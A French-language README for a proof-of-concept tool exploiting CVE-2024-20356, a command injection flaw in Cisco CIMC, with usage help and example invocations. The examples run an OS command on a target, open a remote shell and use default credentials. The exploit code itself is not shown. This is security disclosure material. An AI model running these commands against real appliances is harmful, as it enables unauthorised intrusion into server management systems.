
Ceci est une preuve de concept pour CVE-2024-20356, une vulnérabilité d'injection de commandes dans le CIMC de Cisco.
Ceci est une preuve de concept pour CVE-2024-20356, une vulnérabilité d'injection de commandes dans le CIMC de Cisco.
Les détails techniques complets se trouvent à l'adresse https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom
Usage: CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
options:
-h, --help Show this help message and exit
-t HOST, --host HOST Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
-u USERNAME, --username USERNAME
Username (default: admin)
-p PASSWORD, --password PASSWORD
Password (default: cisco)
-a ACTION, --action ACTION
Action: test, cmd, shell, dance (default: test)
-c CMD, --cmd CMD OS command to run (Default: NONE)
-v, --verbose Displays more information about cimc
Exemples de commandes :
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance
Utilisez l'argument --help pour obtenir les instructions complètes d'utilisation.
Cette preuve de concept est à des fins de démonstration et ne doit pas être utilisée pour des activités illégales. LRQA Nettitude n'est pas responsable des dommages causés par l'utilisation ou la mauvaise utilisation de ce code.